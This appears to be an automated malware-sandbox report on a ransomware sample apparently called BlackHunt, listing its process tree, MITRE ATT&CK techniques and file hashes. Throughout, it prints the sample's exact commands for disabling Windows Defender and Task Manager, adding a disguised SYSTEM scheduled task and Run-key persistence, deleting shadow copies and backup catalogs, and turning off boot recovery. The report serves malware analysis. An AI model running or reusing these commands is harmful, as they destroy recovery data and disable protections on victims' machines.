C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2380
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4164
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:4520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4336
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4308
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1668
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3056
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4892
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2020
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe" /F2⤵PID:1188
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe" /F3⤵
- Creates scheduled task(s)
PID:4916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3728
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1976
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4172
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4920
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2904
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1164
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2560
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4360
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3064
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4872
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5500
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6832
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1132
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD54f6e465f37ef44ada185857beb86e6d7
SHA188b0bb44637d5d43bb02a5d63f553c2202a2ddaa
SHA256b202bb8d70ad95675c7725b9e29ea1dc36601357a0f6c0d1baf2aa5a19f2abac
SHA512a74e382bcc81352bb8624d9b0075cf08edcacea94a16f4bda22992775deb4fe9bc57eedace4044b62d65b6a77a0e7216920f6b90e83d112ca3e2f76ae360935d
-
Filesize
1KB
MD588eb5efb3b9751cfff9c5733d310d2b8
SHA14e7f7937e0404406c3c3e56f003e3fc4a0f8a5c1
SHA256841e2a250160bf1d443f8ed55a23112db62cc87b9bac34fbb32dc3c701d1a8a2
SHA512a57c2662525f965ae1effe71328c11628f2f842c4e823fbe041fd7c1c10cdee2784b2eb2a6411ed69ad72832afedb4728e3329932b365287f53ce1014a77b041
-
Filesize
684B
MD5f1e8cea7cbe7cec6364c544e8746e641
SHA17e51ee7ce04e928061619c18450c2582e6fb5d52
SHA256cb804f9449b9e55a1979d4e85742ca7a5fec6dd29fdb30584af459b20ef3f994
SHA5121edec334147bc02acfc6ea627fa7ec3198c9743da8bcc0c3f7e0d3e9cfd4edc5c8d57a29282a908fe7e2ebf20efc44222a5b95c193de8b43576e04ed0d954e39